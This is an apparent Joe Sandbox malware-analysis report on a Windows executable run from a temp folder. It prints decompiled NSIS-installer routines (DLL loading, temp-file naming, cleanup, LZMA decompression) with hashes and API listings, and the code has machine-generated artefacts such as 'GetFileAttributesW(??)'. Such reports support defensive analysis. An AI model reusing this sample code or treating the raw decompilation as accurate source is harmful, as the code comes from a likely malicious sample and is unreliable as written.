                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c$C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 1941528284-3876828283
                                                                                    • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                    • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                    • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                    • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                                    C-Code - Quality: 100%
                                                                                    			E004069C5(intOrPtr _a4) {
                                                                                    				short _v576;
                                                                                    				signed int _t13;
                                                                                    				struct HINSTANCE__* _t17;
                                                                                    				signed int _t19;
                                                                                    				void* _t24;
                                                                                    
                                                                                    				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                    				if(_t13 > 0x104) {
                                                                                    					_t13 = 0;
                                                                                    				}
                                                                                    				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                    					_t19 = 1;
                                                                                    				} else {
                                                                                    					_t19 = 0;
                                                                                    				}
                                                                                    				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                    				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                    				return _t17;
                                                                                    			}








                                                                                    0x004069dc
                                                                                    0x004069e5
                                                                                    0x004069e7
                                                                                    0x004069e7
                                                                                    0x004069eb
                                                                                    0x004069fe
                                                                                    0x004069f8
                                                                                    0x004069f8
                                                                                    0x004069f8
                                                                                    0x00406a17
                                                                                    0x00406a2b
                                                                                    0x00406a32

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                    • wsprintfW.USER32 ref: 00406A17
                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-1946221925
                                                                                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 532 406187-406193 533 406194-4061c8 GetTickCount GetTempFileNameW 532->533 534 4061d7-4061d9 533->534 535 4061ca-4061cc 533->535 537 4061d1-4061d4 534->537 535->533 536 4061ce 535->536 536->537
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                    				intOrPtr _v8;
                                                                                    				short _v12;
                                                                                    				short _t12;
                                                                                    				intOrPtr _t13;
                                                                                    				signed int _t14;
                                                                                    				WCHAR* _t17;
                                                                                    				signed int _t19;
                                                                                    				signed short _t23;
                                                                                    				WCHAR* _t26;
                                                                                    
                                                                                    				_t26 = _a4;
                                                                                    				_t23 = 0x64;
                                                                                    				while(1) {
                                                                                    					_t12 =  *L"nsa"; // 0x73006e
                                                                                    					_t23 = _t23 - 1;
                                                                                    					_v12 = _t12;
                                                                                    					_t13 =  *0x40a5ac; // 0x61
                                                                                    					_v8 = _t13;
                                                                                    					_t14 = GetTickCount();
                                                                                    					_t19 = 0x1a;
                                                                                    					_v8 = _v8 + _t14 % _t19;
                                                                                    					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                    					if(_t17 != 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t23 != 0) {
                                                                                    						continue;
                                                                                    					} else {
                                                                                    						 *_t26 =  *_t26 & _t23;
                                                                                    					}
                                                                                    					L4:
                                                                                    					return _t17;
                                                                                    				}
                                                                                    				_t17 = _t26;
                                                                                    				goto L4;
                                                                                    			}












                                                                                    0x0040618d
                                                                                    0x00406193
                                                                                    0x00406194
                                                                                    0x00406194
                                                                                    0x00406199
                                                                                    0x0040619a
                                                                                    0x0040619d
                                                                                    0x004061a2
                                                                                    0x004061a5
                                                                                    0x004061af
                                                                                    0x004061bc
                                                                                    0x004061c0
                                                                                    0x004061c8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061cc
                                                                                    0x00000000
                                                                                    0x004061ce
                                                                                    0x004061ce
                                                                                    0x004061ce
                                                                                    0x004061d1
                                                                                    0x004061d4
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004061A5
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-678247507
                                                                                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 538 403c25-403c34 539 403c40-403c48 538->539 540 403c36-403c39 CloseHandle 538->540 541 403c54-403c60 call 403c82 call 405d74 539->541 542 403c4a-403c4d CloseHandle 539->542 540->539 546 403c65-403c66 541->546 542->541
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403C25() {
                                                                                    				void* _t1;
                                                                                    				void* _t2;
                                                                                    				void* _t4;
                                                                                    				signed int _t11;
                                                                                    
                                                                                    				_t1 =  *0x40a018; // 0xffffffff
                                                                                    				if(_t1 != 0xffffffff) {
                                                                                    					CloseHandle(_t1);
                                                                                    					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                    				}
                                                                                    				_t2 =  *0x40a01c; // 0xffffffff
                                                                                    				if(_t2 != 0xffffffff) {
                                                                                    					CloseHandle(_t2);
                                                                                    					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                    					_t11 =  *0x40a01c;
                                                                                    				}
                                                                                    				E00403C82();
                                                                                    				_t4 = E00405D74(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsg14BE.tmp\\", 7); // executed
                                                                                    				return _t4;
                                                                                    			}







                                                                                    0x00403c25
                                                                                    0x00403c34
                                                                                    0x00403c37
                                                                                    0x00403c39
                                                                                    0x00403c39
                                                                                    0x00403c40
                                                                                    0x00403c48
                                                                                    0x00403c4b
                                                                                    0x00403c4d
                                                                                    0x00403c4d
                                                                                    0x00403c4d
                                                                                    0x00403c54
                                                                                    0x00403c60
                                                                                    0x00403c66

                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                    • C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\, xrefs: 00403C5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsg14BE.tmp\
                                                                                    • API String ID: 2962429428-1318436237
                                                                                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 630 40603f-40605a call 406668 call 405fe2 635 406060-40606d call 4068ef 630->635 636 40605c-40605e 630->636 640 40607d-406081 635->640 641 40606f-406075 635->641 637 4060b8-4060ba 636->637 643 406097-4060a0 lstrlenW 640->643 641->636 642 406077-40607b 641->642 642->636 642->640 644 4060a2-4060b6 call 405f37 GetFileAttributesW 643->644 645 406083-40608a call 40699e 643->645 644->637 650 406091-406092 call 405f83 645->650 651 40608c-40608f 645->651 650->643 651->636 651->650
                                                                                    C-Code - Quality: 53%
                                                                                    			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                                    				int _t11;
                                                                                    				signed char* _t12;
                                                                                    				long _t16;
                                                                                    				intOrPtr _t18;
                                                                                    				intOrPtr* _t21;
                                                                                    				signed int _t23;
                                                                                    
                                                                                    				E00406668(0x425f50, _a4);
                                                                                    				_t21 = E00405FE2(0x425f50);
                                                                                    				if(_t21 != 0) {
                                                                                    					E004068EF(_t21);
                                                                                    					if(( *0x42a278 & 0x00000080) == 0) {
                                                                                    						L5:
                                                                                    						_t23 = _t21 - 0x425f50 >> 1;
                                                                                    						while(1) {
                                                                                    							_t11 = lstrlenW(0x425f50);
                                                                                    							_push(0x425f50);
                                                                                    							if(_t11 <= _t23) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t12 = E0040699E();
                                                                                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                    								E00405F83(0x425f50);
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								goto L1;
                                                                                    							}
                                                                                    						}
                                                                                    						E00405F37();
                                                                                    						_t16 = GetFileAttributesW(??); // executed
                                                                                    						return 0 | _t16 != 0xffffffff;
                                                                                    					}
                                                                                    					_t18 =  *_t21;
                                                                                    					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                    						goto L1;
                                                                                    					} else {
                                                                                    						goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    				L1:
                                                                                    				return 0;
                                                                                    			}









                                                                                    0x0040604b
                                                                                    0x00406056
                                                                                    0x0040605a
                                                                                    0x00406061
                                                                                    0x0040606d
                                                                                    0x0040607d
                                                                                    0x0040607f
                                                                                    0x00406097
                                                                                    0x00406098
                                                                                    0x0040609f
                                                                                    0x004060a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406083
                                                                                    0x0040608a
                                                                                    0x00406092
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040608a
                                                                                    0x004060a2
                                                                                    0x004060a8
                                                                                    0x00000000
                                                                                    0x004060b6
                                                                                    0x0040606f
                                                                                    0x00406075
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406075
                                                                                    0x0040605c
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00406098
                                                                                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004060A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: P_B
                                                                                    • API String ID: 3248276644-906794629
                                                                                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 653 407194-40719a 654 40719c-40719e 653->654 655 40719f-4071bd 653->655 654->655 656 407490-40749d 655->656 657 4073cb-4073e0 655->657 660 4074c7-4074cb 656->660 658 4073e2-4073f8 657->658 659 4073fa-407410 657->659 661 407413-40741a 658->661 659->661 662 40752b-40753e 660->662 663 4074cd-4074ee 660->663 664 407441 661->664 665 40741c-407420 661->665 668 407447-40744d 662->668 666 4074f0-407505 663->666 667 407507-40751a 663->667 664->668 669 407426-40743e 665->669 670 4075cf-4075d9 665->670 671 40751d-407524 666->671 667->671 673 406bf2 668->673 674 4075fa 668->674 669->664 675 4075e5-4075f8 670->675 676 4074c4 671->676 677 407526 671->677 678 406bf9-406bfd 673->678 679 406d39-406d5a 673->679 680 406c9e-406ca2 673->680 681 406d0e-406d12 673->681 683 4075fd-407601 674->683 675->683 676->660 684 4074a9-4074c1 677->684 685 4075db 677->685 678->675 686 406c03-406c10 678->686 679->657 689 406ca8-406cc1 680->689 690 40754e-407558 680->690 687 406d18-406d2c 681->687 688 40755d-407567 681->688 684->676 685->675 686->674 691 406c16-406c5c 686->691 692 406d2f-406d37 687->692 688->675 693 406cc4-406cc8 689->693 690->675 694 406c84-406c86 691->694 695 406c5e-406c62 691->695 692->679 692->681 693->680 696 406cca-406cd0 693->696 701 406c94-406c9c 694->701 702 406c88-406c92 694->702 699 406c64-406c67 GlobalFree 695->699 700 406c6d-406c7b GlobalAlloc 695->700 697 406cd2-406cd9 696->697 698 406cfa-406d0c 696->698 703 406ce4-406cf4 GlobalAlloc 697->703 704 406cdb-406cde GlobalFree 697->704 698->692 699->700 700->674 705 406c81 700->705 701->693 702->701 702->702 703->674 703->698 704->703 705->694
                                                                                    C-Code - Quality: 99%
                                                                                    			E00407194() {
                                                                                    				signed int _t530;
                                                                                    				void _t537;
                                                                                    				signed int _t538;
                                                                                    				signed int _t539;
                                                                                    				unsigned short _t569;
                                                                                    				signed int _t579;
                                                                                    				signed int _t607;
                                                                                    				void* _t627;
                                                                                    				signed int _t628;
                                                                                    				signed int _t635;
                                                                                    				signed int* _t643;
                                                                                    				void* _t644;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					_t530 =  *(_t644 - 0x30);
                                                                                    					if(_t530 >= 4) {
                                                                                    					}
                                                                                    					 *(_t644 - 0x40) = 6;
                                                                                    					 *(_t644 - 0x7c) = 0x19;
                                                                                    					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                    					while(1) {
                                                                                    						L145:
                                                                                    						 *(_t644 - 0x50) = 1;
                                                                                    						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                    						while(1) {
                                                                                    							L149:
                                                                                    							if( *(_t644 - 0x48) <= 0) {
                                                                                    								goto L155;
                                                                                    							}
                                                                                    							L150:
                                                                                    							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                    							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                    							 *(_t644 - 0x54) = _t643;
                                                                                    							_t569 =  *_t643;
                                                                                    							_t635 = _t569 & 0x0000ffff;
                                                                                    							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                    							if( *(_t644 - 0xc) >= _t607) {
                                                                                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                    								_t628 = _t627 + 1;
                                                                                    								 *_t643 = _t569 - (_t569 >> 5);
                                                                                    								 *(_t644 - 0x50) = _t628;
                                                                                    							} else {
                                                                                    								 *(_t644 - 0x10) = _t607;
                                                                                    								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                    								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                    							}
                                                                                    							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                    								L148:
                                                                                    								_t487 = _t644 - 0x48;
                                                                                    								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                    								L149:
                                                                                    								if( *(_t644 - 0x48) <= 0) {
                                                                                    									goto L155;
                                                                                    								}
                                                                                    								goto L150;
                                                                                    							} else {
                                                                                    								L154:
                                                                                    								L146:
                                                                                    								if( *(_t644 - 0x6c) == 0) {
                                                                                    									L169:
                                                                                    									 *(_t644 - 0x88) = 0x18;
                                                                                    									L170:
                                                                                    									_t579 = 0x22;
                                                                                    									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                    									_t539 = 0;
                                                                                    									L172:
                                                                                    									return _t539;
                                                                                    								}
                                                                                    								L147:
                                                                                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                    								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                    								_t484 = _t644 - 0x70;
                                                                                    								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                    								goto L148;
                                                                                    							}
                                                                                    							L155:
                                                                                    							_t537 =  *(_t644 - 0x7c);
                                                                                    							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                    							while(1) {
                                                                                    								L140:
                                                                                    								 *(_t644 - 0x88) = _t537;
                                                                                    								while(1) {
                                                                                    									L1:
                                                                                    									_t538 =  *(_t644 - 0x88);
                                                                                    									if(_t538 > 0x1c) {
                                                                                    										break;
                                                                                    									}
                                                                                    									L2:
                                                                                    									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                                    										case 0:
                                                                                    											L3:
                                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L4:
                                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                    											_t538 =  *( *(_t644 - 0x70));
                                                                                    											if(_t538 > 0xe1) {
                                                                                    												goto L171;
                                                                                    											}
                                                                                    											L5:
                                                                                    											_t542 = _t538 & 0x000000ff;
                                                                                    											_push(0x2d);
                                                                                    											asm("cdq");
                                                                                    											_pop(_t581);
                                                                                    											_push(9);
                                                                                    											_pop(_t582);
                                                                                    											_t638 = _t542 / _t581;
                                                                                    											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                    											asm("cdq");
                                                                                    											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                    											 *(_t644 - 0x3c) = _t633;
                                                                                    											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                    											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                    											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                    											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                    												L10:
                                                                                    												if(_t641 == 0) {
                                                                                    													L12:
                                                                                    													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                    													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                    													goto L15;
                                                                                    												} else {
                                                                                    													goto L11;
                                                                                    												}
                                                                                    												do {
                                                                                    													L11:
                                                                                    													_t641 = _t641 - 1;
                                                                                    													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                    												} while (_t641 != 0);
                                                                                    												goto L12;
                                                                                    											}
                                                                                    											L6:
                                                                                    											if( *(_t644 - 4) != 0) {
                                                                                    												GlobalFree( *(_t644 - 4));
                                                                                    											}
                                                                                    											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    											 *(_t644 - 4) = _t538;
                                                                                    											if(_t538 == 0) {
                                                                                    												goto L171;
                                                                                    											} else {
                                                                                    												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                    												goto L10;
                                                                                    											}
                                                                                    										case 1:
                                                                                    											L13:
                                                                                    											__eflags =  *(_t644 - 0x6c);
                                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                                    												L157:
                                                                                    												 *(_t644 - 0x88) = 1;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L14:
                                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                    											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                    											_t45 = _t644 - 0x48;
                                                                                    											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                    											__eflags =  *_t45;
                                                                                    											L15:
                                                                                    											if( *(_t644 - 0x48) < 4) {
                                                                                    												goto L13;
                                                                                    											}
                                                                                    											L16:
                                                                                    											_t550 =  *(_t644 - 0x40);
                                                                                    											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                    												L20:
                                                                                    												 *(_t644 - 0x48) = 5;
                                                                                    												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                    												goto L23;
                                                                                    											}
                                                                                    											L17:
                                                                                    											 *(_t644 - 0x74) = _t550;
                                                                                    											if( *(_t644 - 8) != 0) {
                                                                                    												GlobalFree( *(_t644 - 8));
                                                                                    											}
                                                                                    											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                    											 *(_t644 - 8) = _t538;
